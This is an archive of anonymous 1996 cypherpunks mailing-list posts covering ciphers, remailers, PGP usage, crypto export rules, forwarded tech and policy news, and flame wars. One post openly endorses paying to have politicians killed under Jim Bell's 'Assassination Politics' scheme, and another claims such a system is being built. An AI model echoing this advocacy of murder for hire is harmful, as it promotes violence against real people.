Anybody have info on the SEAL cipher?  I can't find any
descriptions or analysis of it.  Refs, proceedings or URLS
would be a good thing.
(It isn't related to NSEA is it?!?)

@_date: 1996-01-28 09:03:15
@_author: Anonymous 
@_subject: RANT: When hi-tech is a hinderance (freedom w/in limits) 
A short 'rant' on techno-dinosaurism...
Saw a blurb on CNN last night about computerized missiles
that would defeat jamming devices and analyze the type of
target and configure their warheads appropriately.  All that
I could think of is what an expensive waste of computing
machinery... is the cost of a "genius bomb" (assuming it does actually work, unlike the Patriots in Gulf War) worth
while?  Wouldn't it be better to use a lot of dumb bombs that
launch several millions of dollars apiece at a tank or bit
of artillery?
I'm reminded of the tech they used to detect guerrillas in
Vietnam... sensors that went off when uric acid (?) was present
so the VC would pis in buckets and walk away, making the
sensors go wild... the US put a lot of effort into bombing
pis buckets.
Or look back to the 13th century when European soldiers were
high-tech wearing tons of armor and used cross bows.  it was
imposing high-tech for the time, but they couldn't move fast or
fire arrows quickly... and they were skagmeat for Mongols
who were comparatively low-tech.
Cypherpunks or crypto relevance?  Sometimes high-tech can be
a weakness.
I've heard that the Soviets, not having the luxury of sexy
Crays and whatnot, were adept and using hundreds of PCs to
do their cryptanalysis... and so may have a lot of interesting
parallel processing algorithms.
To paraphrase Miles Davis, creativity is "freedom within

@_date: 1996-01-28 23:35:01
@_author: Anonymous 
@_subject: TollRoad (CA 91) and anonymity (fwd) 
Newsgroups: misc.transport.road,rec.autos.driving,ca.driving
Organization: Woo Studios Ltd.
Lines: 103
Sender: dc at panix3.panix.com
 <4d6a2u$rh9 at curly.cc.emory.edu>
NNTP-Posting-Host: panix3.panix.com
X-Newsreader: Gnus v5.0.13

@_date: 1996-01-29 16:00:43
@_author: Anonymous 
@_subject: No Subject 
I'm glad this interesting conversation came up. I apologize for
writing this anonymously, but I don't want to do anything to associate
my nym with my conventional name. The very act of comparing the
actions of the two entities would endanger my anonymity.
I use a nym to talk publically about a certain topic that, while it is
legal and not really that embarassing, I would rather not have
associated with my conventional name. In particular, I don't want my
thoughts on this topic to be archived by my conventional name. So I
use a nym, and it basically works. I think a really determined person
could break my nym even today, but I don't think anyone will ever be
that determined and I'm not that worried about it.
Yes, each nym (and your conventional name, which in some ways is just
another nym) has to have its own, independent reputation. I don't know
any way around this. The whole point of a nym is so the actions of
your nym don't affect the reputation of your conventional name.
You could tell trusted people about the association between your nym
and your conventional name, but you're compromising your nym in doing
that. You have to develop a threat model - how seriously do you want
to keep your anonymity?
A perfectly secure one does, by definition - if no one can ever
associate your nym with your conventional name, in particular if no
one knows that you have a nym, then there is no problem. The question
is, how close are we today to that perfection?  Getting lots of mail
from remailers currently looks supicious.
Yes. One thing to remember is that a response block associates an
email address with a public key for ever and all time. To be safer,
you need to not let mail from the nym go back to a private email box.
True anonymity is inconvenient.

@_date: 1996-01-30 01:09:11
@_author: Anonymous 
@_subject: No Subject 
Of course.  My signature was bad.
  I got a message in response to a request I made to someone for their public
key.  I wanted to check the signatures that they included with their posts
to cypherpunks, but their key was not on the keyservers.  The key they
included was completely unsigned, and when I use it to validate their
previous posts as well as the message they sent which included the key, the
signatures come back as bad, the contents of the file changed.  Names are
appropriately withheld (I hope).  As I understand the bcc: definition, only
I and the first smtp server this message hits should know who it's to.  I
don't know if anyone else reading this mailing list needs this info, but
just in case... here's my reply to the message.
Don't worry about being a 'newbie'.  Everyone starts somewhere.  However,
your key will usually not 'find its way' to a server without you
specifically sending it.  The keyserver I usually use is accessed by sending
a mail message which fits the following format.  As far as I know, all the
keyservers use this format to add or update keys in their databases.  You
only have to send it to one keyserver, and it will propagate to all the
others.  I have indented the text so that no handlers decide to interpret it
as a new message.
- - To: pgp-public-keys at pgp.iastate.edu
- - Subject: ADD
- -
- - -----BEGIN PGP PUBLIC KEY BLOCK-----
- - Version: 2.6.2
- -
- - [key deleted to protect the innocent]
- -
- - -----END PGP PUBLIC KEY BLOCK-----
If you don't admit you don't know something, nobody will usually tell you
how to do it.  Also, you should sign your own key.  That will make it harder
to forge, I think.  The reasons were spelled out in a couple of the web
pages I read, but I've forgotten them.  It has something to do with either a
denial of service attack or a man in the middle attack, or both.  The
command to do this is:
pgp -ks 0xHEXKEYID
Honestly, I've only just begun to use pgp myself.  Also, you should add your
e-mail address to the user-id of your key.  The command to do so is: pgp -ke 0xHEXKEYID
You will be asked if you wish to add a user id to the key.  Say yes, and
give it your e-mail address.  What this does is it allows people who are
using pgp-enabled mailers to directly encrypt messages to you without
choosing your key manually.
The reason that I have not encrypted this message to you using the key you
provided is that when I extracted the key and re-checked your message, the
signature was no good.  I've found that (using eudora) I must turn off the
word wrap feature of my mailer to allow for good signed messages out.  Of
course, having said this, I'll probably not get a good signature on this
message.  Let me know if it signs ok.
Now, I have a question.  Which attack(s) is/are a person vulnerable to when
distributing an unsigned public key in the open?  Could this actually be a
complex man-in-the-middle attack?  Am I paranoid?

@_date: 1996-01-30 20:13:00
@_author: Anonymous 
@_subject: FV Demonstrates Fatal Flaw (Noise + Humour) 
(Second year PR student press release crap deleted)
On 1/29/96 Nathaniel Borenstein preached the evils of Internet Commerce.......
NB> If your idea of "today's computer users" comes from cypherpunks, you're
NB> living in a dream world. FV's experience with average Internet users NB> includes some of us who ask us not to use complicated "technical terms" like
NB> "cut and paste".  Ther certainly can't be counted on to know which
NB> software to download and which to avoid.
I'd bet that one half learned to download and use Vueprint 4.3 and the other
are finishing up learning Mavis Beacon's Typing Tutor.
Later on in the day, Nate yacked that......
NB> This is fine for you and me.  But Internet commerce has to work for the
NB> hundreds of millions of non-technical consumers who are swarming onto
NB> the Internet.  If someone emails them a program that purports to show
NB> them pretty pictures (dirty movies?).....
Glad you are trying to market some of your other overpriced services, Point your
(Not THAT!!!) browser to:
and pan down to the bottom of the page, Seems that every third service for
sale by
First Virtual is about sex. For instance......
adult advertising, amateur art, bisexual, cyberpunk (full of dating
services?!?) gay,
images, jpegjpg, lesbian literature, male marketing, nude, nudity,
pornography, sex,
singles, and on and on!
Send out a press release after Chaum has bought you guys out!
The Christmas Troll

@_date: 1996-02-01 12:06:59
@_author: Anonymous 
@_subject: GTE and Cylink ATM Crypto 
GTE & Cylink Team On Encryption For ATM
Washington, D.C., 31 January 1996 -- During a press
conference last night at Comnet, GTE and Cylink unveiled InfoGuard 100, a jointly developed offering billed as the
first encryption system able to work with ATM
(asynchronous transfer mode).  InfoGuard 100 is meant to provide the security needed to induce business and government to use ATM public
networks, said Michael M. Guzelian, GTE's marketing
director for broadband systems, speaking at the press
conference.  GTE is the number one provider of encryption to the
federal government, while Cylink holds a 70 percent share
of the commercial encryption market, according to Kamy
Kavianian, senior product marketing manager at Cylink for
SecureWAN.  GTE and Cylink will also jointly market the new ATM encryption system. "The deal (for InfoGuard 100) is
mutually exclusive, but we don't know anyone else who can
do it," noted Jeff Callo, Cylink's director of business
InfoGuard consists of two main components, according to
the officials. An ATM adapter from GTE provides ATM
interfaces and cell processing and control functions.  Cylink's CIDEC-VHS contributes "high-speed data
encryption and decryption," in addition to physical
security and "full automated key functions."  Kavianian told the journalists that InfoGuard 100 is
based on DES encryption. Users of InfoGuard will foil
"key exhaustion," a method used for breaking encryption
codes, if they "change their codes frequently," Guzelian
added. Essentially, CIDEC-VHS has turned out to be "the first encryption method fast enough to keep up with ATM,"
Guzelian maintained.  The agreement between Cylink and GTE represents "an excellent example of coopetition," Callo said.

@_date: 1996-02-01 13:41:21
@_author: Anonymous 
@_subject: CRAX Mix Rax 
European Commission Moves To Stamp Out Racism On Internet
Burssels, 31 Jan 1996 -- The European Commission (EC) has
formed a pan-European group to "encourage the mixing of
people of different cultures" from both inside and
outside Europe.  According to EC officials, the first task of the
Consultative Commission on Racism and Xenophobia (CRAX),
as it is called, will be to investigate and, using legal
means, stamp out the current wave of racism on the
Internet.  In a prepared statement, CRAX said that it hopes that the
EC "will take all needed measures to prevent the Internet
from becoming a vehicle for the incitement of racist
hatred."  EC officials are soft-peddling on what legislation they
plan to enact to back up the investigations of CRAX.
Currently, apart from France and Germany, there is no
specific anti-racist legislation.
The laws of France and Germany were created in the
aftermath of the Second World War in order to prevent the
rising of the so-called "Fourth Reich," an extremist
group which posts messages on the Internet, as well as
running Thule bulletin board systems (BBSs) in Germany. According to EC officials, the Thule BBSs, which first
appeared in 1991, started spreading the Neo-Nazi word on
the Internet in late 1994, having established themselves
as a means of information exchange in Germany and, to a
limited extent, in France.
As reported previously, the "Thule Network" first came to the public's attention when the January, 1994, issue
of Chip magazine (a popular computer monthly in Germany)
claimed to have unearthed eight Thule BBSs.  According to Chip magazine at the time, "The (Thule)
network distributes information on demonstrations and
invitations to meetings, addresses for contacting parties
and groups, and it reviews and offers books and
magazines. One of the mail-boxes contained instructions
for producing military explosives and letter bombs. A
great deal of space is taken up by 'political
discussions' among the users."
Thule is Norse or Viking terminology for "top of the
world." The Thule Network's name actually derives from
the small, elitist 1920s movement which was considered to
be the Nazi vanguard. Thule movement leaders included
Rudolf Hess. Some BBSs on the Thule network have names
such as "Wolf Box" and "Resistance," while many Internet
messages are signed by people calling themselves "The
Wolf," among other names.

@_date: 1996-02-01 13:48:47
@_author: Anonymous 
@_subject: Online Libel Rules 
UK - New Rules For Online Libel Called For
Wokingham, Bershire, England, 31 January 1996 --
CompuServe, Europe Online, and Microsoft Network (MSN),
have banded together to lobby the British Government for
a clear definition of the legal rules for online libel. In British law, libel is defined as a defamatory
statement. Because of the "new" nature of online
services, however, online libel is treated as something
of a gray area as regard legal issues.
In a joint submission to the Lord Chancellor's
department, the three online companies claim that online
service providers typically cannot control the content of
messages that users of their services or the Internet,
The companies are recommending that the online service
provider not be held responsible for libels statements
made online, unless the service provider has "reasonable
notice" that a libels statement has been transmitted on
to its system, and "has the ability and the authority to prevent" its publication, but "fails to do so" within
a reasonable time.  According to Andrew Gray, European business manager with
CompuServe, the Chancellor's Department is currently
conducting an extensive review of UK libel law to deal
with a number of current problems. Based upon this
review, the Government is expected to introduce new libel
legislation this spring.
"We applaud the Lord Chancellor's Department's efforts to
bring the defamation law up to date. We hope that the
upcoming legislation will deal effectively with the
problem of libel that takes place over an online service
or the Internet," Gray explained.
Andreas Breijs, manager of Europe Online, meanwhile, said
that online services are not like traditional newspapers
or magazines. "These services are more like a railway
train, where the operator may own the passenger cars, but
has no idea what the passengers may be saying to each
other, and no way of controlling their conversations," he
Judy Gibbons, manager of Microsoft's MSN operating in the
UK, said that the major online providers work hard to run
responsible services. "They should not be penalized for
the actions of unrelated individuals who might happen to
make libelous statements using their services without the
knowledge or consent of the service provider," she said. Alistair Kelman, a lawyer specializing in information
technology (IT) affairs, said that he was not surprised
by the online services' request to the Lord Chancellor's
Department, especially given the current situation.  "There is no case law on this subject and it is likely
that a test case will come sooner, rather than later. The
Government is keen on a clarification on the issue, as it
is itself publishing a lot of its information on the
Internet, in the move towards a more open and IT-relevant
Government," he explained.
Peter Sommer, an IT security specialist and Fellow of the
London School of Economics, said that, far from being
just another publishing medium, it was important that
people understand that the Internet is very similar to a
telephone line.
"If I libel someone over the phone, you're not going to
involve the telephone company, are you? It's the same
with the Internet and some online services. Of course, if
the online service has the ability to remove someone's
comments and does not do it, then it's a different matter
and that is what the definition by the Lord Chancellor's
office is all about," he said.

@_date: 1996-07-18 23:08:27
@_author: Anonymous 
@_subject: (fwd) Re: US versions of Netscape now available---NOT 
: >>Yes.  We've had a few thousand people download it.  Unfortunately, we
: >>only have one machine serving downloads right now, and it tends to melt
: >>down a couple times a day.
: >
: >I've tried four times, and each time has timed out. (That is, I've filled
: >out the Web form four times and tried n times each iteration...at least I
: >get to experiment with variations on my name and address each time :-})
: >
: >I guess I'll have to connect to the Italian and/or Swedish sites again. Has
: >the software arrived there yet?
: : Very droll. I had no trouble downloading it first try. Perhaps you should
: switch to Netcom. :-)
: Tim you may use this as entry data:
   Whatever YaKnow
   cybernut at nutcom.com
   10401 Wilshire Blvd, Suite 805
   Los Angeles, CA 90024-4628
   (310) 475-3799
Your friend.

@_date: 1996-07-20 05:18:47
@_author: Anonymous 
@_subject: Netscape 
There appears to be some new Netscape files with US
encryption in ftp://utopia.hacktic.nl/pub/replay/pub/incoming/
netscape-fts2-hp10.tar.gz	Fast Track Server 2.0 for HPUX10
netscape-fts2-nt.exe		Fast Track Server 2.0 for WinNT
netscape-hpus-30b5.tar.gz	Navigator 3.0b5 for HP-UX
netscape-linux-30b5.tar.gz	Navigator 3.0b5 for Linux
netscape-ssl30-src.tar.gz	SSL 3.0 source code
netscape32us-30b5.exe		Navigator 3.0b5 for Win95/NT
By the way, is it possible to get a certificate for the
Fast Track 128 bit servers outside of north america? Or
would the certificate issuer be conspiring to export
crypto if he exported a certificate?

@_date: 1996-07-20 19:37:25
@_author: Anonymous 
@_subject: Netscape 
Why is it a bad idea? If you don't do it, you support the ITAR
by your lack of action! Every day that you don't export strong
crypto you assist the enemy.
Mac download didn't work yesterday. The download page doesn't
say if the Solaris versions are for Sparc or Intel (they are
different and incompatible binaries, aren't they?).
Just for fun. To show the TLAs what complete morons they are...
irony. This whole thing isn't Netscape's fault; in fact, they're
Do you Seriously Believe that Netscape would prefer foreigners
to develop and use competing products? Of course not. They are
probably secretly applauding the brave exporters.

@_date: 1996-07-20 20:50:23
@_author: Anonymous 
@_subject: Borders *are* transparent 
Sternlight blathered [regarding Tim]:
Starting off with defamation is a sure tipoff that what follows is crap.
And sure enough...[he sure makes it convenient for sarcastic "cowards"
like me to use his own words against him.]
Perry's right, DS *would* do it with a dawg.
You tell the stated purpose, the NSA's own lawyers have told PRZ and others
(off the record, of course) that there is a domestic (and therefore a Constitutionally impermissible) purpose. Read the Bill of Rights.
Hell, they can pay Netscape anonymously. David, if you try double standards
around here any more, I will make fun of you more, EVERY TIME.
I will not stop. I note that you have the common [but not necessarily fucking]
statist flaw of needing to get in the last word in every argument, rather than
just agreeing to disagree. Chill out. For the health of the list, please try to tone down the volume and number of your posts to something more closely
approaching reasonable.

@_date: 1996-07-25 01:51:35
@_author: Anonymous 
@_subject: Netscape 
If you look real carefully at ftp://utopia.hacktic.nl/pub/replay
has actually been uploaded.
The reason that is was not done sooner is probably that it felt
more like stealing to upload software that Netscape expected you
to pay for. Now that Netscape is finally giving away strong crypto
versions to anybody who asks for it (and claims to be an American)
it isn't really stealing in the same sense anymore. It's just ITAR
we're ignoring, not Netscape's commercial interests.

@_date: 1996-07-26 19:03:10
@_author: Anonymous 
@_subject: No Subject 
On 7/25/96, Louis Freeh said:
-  - In the Aldrich Ames spy case, where Ames was told by his Soviet       -  handlers to encrypt computer file information to them.
-  -  - In a child pornography case, where one of the subjects used
-  encryption in transmitting obscene and pornographic images of children
-  over the Internet.                                                    -  - In a major drug-trafficking case, where one of the subjects of one
-  of the court-ordered wiretaps used a telephone encryption device which
-  frustrated the surveillance.                                         -  - Some of the anti-Government Militia groups are now advocating the   -  use of encryption as a means of preventing law enforcement from              -  properly investigating them.                                          Thats 4 count em FOUR horsemen.
Have a nice day.

@_date: 1996-07-29 18:15:57
@_author: Anonymous 
@_subject: TLAs on cypherpnks (was Re: ALL OF YOU ARE CRIMINAL HACKERS) 
+ I believe my source, who's given me nothing but accurate information
+ before. YMMV, and you will of course filter this through how much you
+ trust *me* to evaluate him. But in the absence of a formal statement from
+ the NSA legal counsel, I think this as good as it gets. + + -Declan
Well, you can always check on the subscribers list.  There are several
addresses from NSA in there (for example ncsc.mil).

@_date: 1996-06-01 21:10:52
@_author: Anonymous 
@_subject: Find Article.  (Hack China?!?) 
Posted in alt.privacy.....
In article <4oo7dj$3am at sunrise.pku.edu.cn>
Please tell me where I can find the WWW site or FTP site with many articles
(thesis,all kinds of paper,etc) about date security and cryptology.
please send your answer to deezxl at tsinghua.edu.cn
Thank you very much.

@_date: 1996-06-02 10:58:32
@_author: Anonymous 
@_subject: Hello there!Re: Where does your data want to go today? 
Someone who claimed to be David F. Ogren said on Sat, 1 Jun 1996:
Why not simply use two session keys, and encrypt the headers with one while encrypting the actual data with the other? That seems to solve both problems, except that more CPU cycles are required.

@_date: 1996-06-02 17:22:15
@_author: Anonymous 
@_subject: Riding online elevators  (Was CNN: Anonymous Stock Tips) 
In my mail this morning was this bit of spam, I never heard of this guy before, Likely scooped my mailing address from misc.invest.stocks.

@_date: 1996-06-08 15:26:39
@_author: Name Withheld by Request 
@_subject: middle-man may be moving... 
The nym server at alpha.c2.org has been down for several days. This
directly affects the middle-man remailer. Since nymrod at nym.jpunix.com has
made it to Raph's list, I'm going to contact the admin at jpunix.com and
see if it's ok for me to point the middle-man remailer nym at his server.
Maybe it will be a little more reliable and allow the middle-man remailer
to work properly. Stay tuned for further details as they occur!
  middle-man-admin at alpha.c2.org (don't bother to reply, it doesn't work)

@_date: 1996-06-09 02:52:37
@_author: Anonymous 
@_subject: No Subject 
:"Well, you aren't being
:carried off in the middle of the night by death squads, so I'm :not going to waste my time on you when I could help other people :in danger of death."  I'm not prepared to argue against that :judgement.
I am.
Russ, this rant is not directed at you. I'm just weary of the Bell-bashing.
Perhaps the reason that our society has evolved to the point of not having to fear deathsquads is because of assholes like Bell who keep prodding us to expand the limits of personal liberty and free speech by their rantings.  He makes me think; sometimes the unthinkable, and gives me the opportunity to _reject_ his ideas.
Each time I suggest that someone goes *a little too far,* I draw in the circle of my own protected speech a bit more. *My God, he can't say that!" He _may_ be an adult who knows and accepts the possible consequences of his speech. Notice the chilling effect on virtually any discussion when the threat of legal action is suggested.  There's the danger.
Read the entire quote by Donne.  *...any man's death diminishes me, because I am involved in mankind;...*  By protecting Bell's right to speak what he thinks, we serve as an example to the rest of the world of what personal freedom really means. *Those crazy Americans* Bell gives me the opportunity to say that his pronouncements are antithetical to the best interests of the _inhabitants_ of this nation, not simply the government itself.
Thank you, Jim.

@_date: 1996-06-09 13:43:19
@_author: Anonymous 
@_subject: Anti-Scientologists 
Untruth  Aside from the "religion" red herring you tossed in (it's a cult), the critics expose the lies, doubletalk and inconsistencies posted by cult apologists. (It should be noted that these people aren't generally "just another satisfied Scientologist," but are cult employees who are carefully vetted to distribute propaaganda without ever answering critics' questions.)
So what's your point? Besides, there is no Cabal fnord. :-)
Untruth  Articles canceled from a.r.s. have been multiple postings of standard Scientology tracts (over 10,000 in all, so my newsreader says), spread out over various alleged users. These aren't intended to promote discussion -- they're intended to bury the newsgroup in noise.
Apparently being selected Kook of the Month causes disturbances in one's ability to distinguish the correct from the incorrect. (Or is that how one gets the award in the first place?)

@_date: 1996-06-10 03:20:47
@_author: Anonymous 
@_subject: FOR WHOM THE BELL TOLLS 
Bryce wrote (whilst on his high horse):
Not every member of this list rejects his views.  I for one do not
reject them outright, but will not defend his views publically for
fear of embarassing the corporation that I work for. I do not
reject Jim Bell's violent views for the simple reason that violence
is often required to fight violence.  In other words, the best you
can hope for is "... but his violent views were rejected by some
members of the group."
He *is* a member. And why shouldn't he be?  Are you suggesting that
this group become moderated? (hiss).  The whole AP concept is very
relevent to the Cypherpunks, whether the majority like it or not.
No platform for lunatics???  If there is one thing that a Cypherpunk
should have learned during his time in the group, is that the answer
to hate speech (or violent speech, or whatever you wish to call it)
is more speech.
If your fear is that reporters will get hold of the wrong end of the
stick, then perhaps you are correct, but the real problem is the
*reporters*, not the attitude of the Cypherpunks.  blame them.
propose a solution. (how about abolition of all libel laws?)
I disagree with the phrase "evil enthusiasms."  Bell is not an
evil man.  A little crazy perhaps, but not evil.  If you bothered
to listen to him, you would find that his aim is to create a
"better" world, where people (especially politicians) are very
much more responsible for their own actions.  He suggests that
the number of deaths due to AP will be less that the number of
deaths due to the current corrupt system.
think about it.  how many on this group would have another man
killed for his views?  For his noisy stereo?  For a competive
advantage in business?  I am confident the answer will be zero.
On the other hand, I would gladly throw in a few dollars to have
certain politicians killed.  gladly.  and I will be able to sleep
at night.  I will sleep better knowing that, although I was
partly responsible for a mans death, I will have saved countless
others (a bit like dropping an a-bomb on Japan).
Question for Jim - would you resort to AP to have Bryce popped off?
Question for Bryce - would you resort to AP to have Jim popped off?

@_date: 1996-06-10 04:34:18
@_author: Anonymous 
@_subject: Anti-Scientologists 
Truth  It is a religion
Truth  It is no longer a cult, since the leader is dead.

@_date: 1996-06-11 06:03:46
@_author: Anonymous 
@_subject: Anti-Scientologists 
Would you describe Christianity as a cult?  If not, why not?

@_date: 1996-06-11 20:13:30
@_author: Anonymous 
@_subject: A guide to self control (Was funny underwear) 
A Guide to Self-Control
  Subject: Steps in Overcoming Masterbation
 Excerpt from a Mormon missionary guide, circa 1970: Steps in
 Overcoming Masterbation, Mark E. Petersen
   1. Never touch the intimate parts of your body except during normal
       toilet processes.
   2. If you are associated with other persons having this same
      problem, YOU MUST BREAK OFF THEIR FRIENDSHIP. Never associate
      with other people having the same weakness. Don't suppose that
      two of you will quit together, you never will. You must get away
      from people of that kind. Just to be in their presence will keep
      your problem foremost in your mind. The problem must be taken OUT
      OF YOUR MIND for that is where it really exists. Your mind must
      be on other and more wholesome things.
   3. When in bed, if that is where you have your problem for the most
      part, dress yourself for the night so securely that you cannot
      easily touch your vital parts, and so that it would be difficult
      and time consuming for you to remove those clothes. By the time
      you started to remove protective clothing you would have
      sufficiently controlled your thinking that the temptation would
      leave you.
   4. If the temptation seems overpowering while you are in bed, GET
      OUT OF BED AND GO INTO THE KITCHEN AND FIX YOURSELF A SNACK,       even  if it is in the middle of the night, and even if you are not
      hungry, and despite your fears of gaining weight. The purpose
      behind this suggestion is that you GET YOUR MIND ON SOMETHING
      ELSE. You are the subject of your thoughts, so to speak.
   5. Never read pornographic material. Never read about your problem.
      Keep it out of mind. Remember -- "First a thought, then an act."
      The thought pattern must be changed. You must not allow this
      problem to remain in your mind. When you accomplish that, you
      soon will be free of the act.
   6. Pray. But when you pray, don't pray about this problem, for that
      will tend to keep [it] in your mind more than ever. Pray for
      faith, pray for understanding of the Scriptures, pray for the
      Missionaries, the General Authorities, your friends, your
      families, BUT KEEP THE PROBLEM OUT OF YOUR MIND BY NOT       MENTIONING  IT EVER -- NOT IN CONVERSATION WITH OTHERS,       NOT IN YOUR PRAYERS.  KEEP IT _OUT_ of your mind!
   7. Be outgoing and friendly. Force yourself to be with others and
      learn to enjoy working and talking to them. Use principles of
      developing friendships found in books such as _How to Win Friends
      and Influence People_ by Dale Carnegie.
   8. Make a pocket calendar for a month on a small card. Carry it with
      you, but show it to no one. If you have a lapse of self control,
      color the day black. Your goal will be to have _no black days_.
      The calendar becomes a strong visual reminder of self control and
      should be looked at when you are tempted to add another black
      day. Keep your calendar up until you have at least three clear
      months.
   9. In the field of psychotherapy there is a very effective technique
      called _aversion therapy_. When we associate or think of
      something very distasteful with something which has been
      pleasurable, but undesirable, the distasteful thought and feeling
      will begin to cancel out that which was pleasurable. If you
      associate something very distasteful with your loss of
      self-control it will help you to stop the act. For example, if
      you are tempted to masturbate, think of having to bathe in a tub
      of worms, and eat several of them as you do the act.
  10. Keep your bladder empty. Refrain from drinking large amounts of
       fluids before retiring.
  11. Reduce the amount of spices and condiments in your food. Eat as
       lightly as possible at night.
  12. Avoid people, situations, pictures or reading materials that
       might create sexual excitement.
  13. It is sometimes helpful to have a physical object to use in
       overcoming this problem. A Book of Mormon, firmly held in hand,
       even in bed at night has proven helpful in extreme cases.
  14. In very severe cases it may be necessary to tie a hand to the bed
       frame with a tie in order that the habit of masturbating in a
       semi-sleep condition can be broken.
  15. Do not let yourself return to any past habit or attitude patterns
       which were part of your problem. Satan Never Gives Up. Be calmly
       and confidently on guard. Keep a positive mental attitude. You
       can win this fight! The joy and strength you will feel when you
       do will give your whole life a radiant and spiritual glow of
       satisfaction and fulfillment.

@_date: 1996-06-13 23:50:33
@_author: Anonymous 
@_subject: No Subject 
_The Atlanta Journal/The Atlanta Constitution_  6/13/96
...From a 1/2 page article:
     *In Georgia the movement appears to be percolating, too. Robert Costner, president of Electronic Freedom Georgia, says the biggest hurdle his group is trying to clear is the unfamiliarity of legislators with the Internet.
     Laws like the CDA are passed, Costner said, "because people are afraid of the Internet just as people were at one time afraid of the printing press.*

@_date: 1996-06-15 16:38:26
@_author: Name Withheld by Request 
@_subject: alpha.c2.org problem? 
For the past two days, all mail to my alias at alpha.c2.org has arrived
with the message stripped out.  All I'm getting is the end remailer's
disclaimer statement.

@_date: 1996-06-17 21:52:07
@_author: Anonymous 
@_subject: UK users about to get clippered 
If you live the UK, brace yourself for HMG's "Clipper" annoucement
later this week.  Look particularly carefully at the escrow agencies.
- Remailereuters

@_date: 1996-06-25 17:25:29
@_author: Anonymous 
@_subject: No Subject 
How do I use the Encrypt-Key: header to include a reply block
in an anonymous posting? I've tried for a few days now, and
I can't seem to make it work.

@_date: 1996-06-27 16:10:10
@_author: Anonymous 
@_subject: Grubor remailer? (Was Re: Lucifer remailer) 
Hm, is that Dr. John Grubor's domain (aga at dhp.com)?
That will make a nice anonymous remailer... NOT! Thank you.
By the way: is there a way in premail to disable a certain remailer
altogether so that it will never be used in chains? There is one
candidate now...

@_date: 1996-06-29 13:47:44
@_author: Anonymous 
@_subject: John Grubor and you 
Why you were expecting people to be posting paranoid rantings if you did
not even know who Dr. John Grubor, undercover police agent, was?

@_date: 1996-06-29 13:55:31
@_author: Anonymous 
@_subject: No Subject 
declan at well.com (Declan McCullagh) spake thus and so:
Sounds like a case of "political testicles in a vise." This smells like
an election-year maneuver so the Clinton administration can maintain its
faade. (After all, who wants to be called "soft on the protection of
children"?) By the time it's finally settled, the Congresscritters will
have been re-elected and can go merrily back to perverting the
So how'd we wind up having to choose between *these* two yahoos for President? :-)

@_date: 1996-03-03 23:18:39
@_author: Anonymous 
@_subject: Netcom and Credit Cards 
The fact that they had been stolen was mentioned in an edition of 2600
6 months before the Mitnick saga.  Netcom had been told about the
security breaches many times, but refused to acknowledge that their
site was insecure.  It was this arrogance that pissed people off
more than their insecurity.

@_date: 1996-03-04 00:12:31
@_author: Anonymous 
@_subject: Assassination Politics 9! 
: : >
: > > "Assassination Politics" Part 9, by Jim Bell, February 27, 1996
: > >
: > > For about a year I have been considering the implications of "Assassination
: > > Politics," and for more than six months I've been sharing the subject and
: > > my musings with you, the interested reader.
: >                   ^^^^^^^^^^^^^^^^^^^^^^^^^^
: > You're pushing it here.
: : No he's not. "Reader" is singular, and Jim is on cypherpunks.
Just because you two aren't interested, doesn't mean others aren't.
Work is actually in progress in implementing such a system.

@_date: 1996-03-04 13:35:28
@_author: Anonymous 
@_subject: Netcom and Credit Cards 
Netcom claim Mitnick broke in during xmas 94, when the reality is that every
half decent hacker had already been there.  Netcom are an INTERNET PROVIDER!!!
You would expect them to know a thing or two about security.
But then again, even security samurais have problems setting up firewalls :-)

@_date: 1996-03-06 10:01:52
@_author: Anonymous 
@_subject: Bombings, Surveillance, and Free Societies 
I argue that the invading of countries, bombing of cities,
starving of towns, burning of villages, hijacking of ships,
and murdering torturing, beating and kidnapping of Arabs to be
"asking for trouble."
I disagree with you here; the only side with nuclear capabilities is

@_date: 1996-03-07 22:16:26
@_author: Anonymous 
@_subject: Announce: 155mbps ATM 3DES crypto gateway 
Secant Network Technologies announces:
The Key Agile Encryption System is an affordable perimeter security
system that provides privacy through high speed cryptography for
information traversing public Asynchronous Transfer Mode networks.
The cryptographic units function as "bump in the fiber" security
interfaces between a secure LAN and a public network.
As data crosses this interface, the system encrypts each ATM cell's payload
without affecting the header. Encrypted cells pass through the
public network infrastructure and are decrypted upon arriving at
the destination LAN. The benefit is that the user can conduct business
as usual within the LAN and only encrypt the data as it enters
the non-secure public network (or non-secure area of a LAN).
Many individual workstations, servers or other end nodes may be protected
by a single encryption unit. The system provides privacy and access
control guarantees when using public ATM networks today, eliminating
the need to wait for implementation and availability of pending
ATM Forum security standards. System operation is transparent to
all network and end user systems.
Available: summer 1996
Physical interfaces: single mode SONET OC-3c, multi mode SONET OC-3c,
        T3 carrier, T1 carrier.
Key management: proprietary method, transparent to network and end user
        equipment, compliant with UNI 3.0/3.1 specifications. SVC's
        handled transparently, PVC support available.
        Public key based authentication. PKCS and X.509 compliant
        public key certificates are supported. Dynamic key update
        based on policy - transparent to end systems.
Key agility: up to 65,534 active VC's per cryptographic unit.
        Each active VC has a unique key.
Encryption algorithms used: triple DES for cell payload encryption,
        triple DES, RSA, and MD5 for key management.
        DES mode agility: single DES, 3DES ECB or 3DES long cycle chaining.
True hardware random number generation (Johnson noise).
Performance: full duplex encryption/decryption at the OC-3c (155Mbps) rate.
        Key management support for up to 35 secure calls per second
        Approximately 16 microseconds latency.
See:  for more details and for contact information.
Based on over 2 years of ARPA funded research:

@_date: 1996-03-08 07:31:59
@_author: Anonymous 
@_subject: No Subject 
This came from Associated Press (27th Feb) :
Europe pushes Asian weapons sales
KUALA LUMPUR, Malaysia - Russia is doing it. So are Britain, France,
Germany and Spain. Even neutral Sweden has joined the race to sell
warplanes, missiles, tanks and warships for Asia's rapidly expanding
The Europeans, fighting an uphill battle against dominant U.S. competitors,
are offering what the Americans sometimes won't - the newest, deadliest
technology with no political strings attached.
While post-Cold War budget cutting devastated the arms trade in the rest of
the world, military spending in Asia is still rising.
totaled $3.4 billion - a 30% increase over their sales in the 1987-1990
period, according to figures compiled by economist Digby Waller of the
International Institute of Strategic Studies in London.
By contrast, American weapons sales in the region were $5.4 billion in
1991-1994, a 7% decline from the previous three-year period.
Despite widespread agreement that U.S. weapons makers are technologically
superior, European producers have signed a flurry of deals with nearly
every Asian country.
According to military analysts, buyers were attracted by Europe's lower
prices, equipment - like submarines - that the United States doesn't sell
and - perhaps most important - the chance to avoid becoming dependent on
American suppliers in case the United States cuts back future arms exports.
In one of the most powerful signs of the Asian market's allure, Russia
tossed out ideological considerations in favor of cash, selling its former
Chinese rivals high-performance Sukhoi 27 jet fighters and the technology
to make more.
Thailand bought an aircraft carrier from Spain. Taiwan bought six frigates
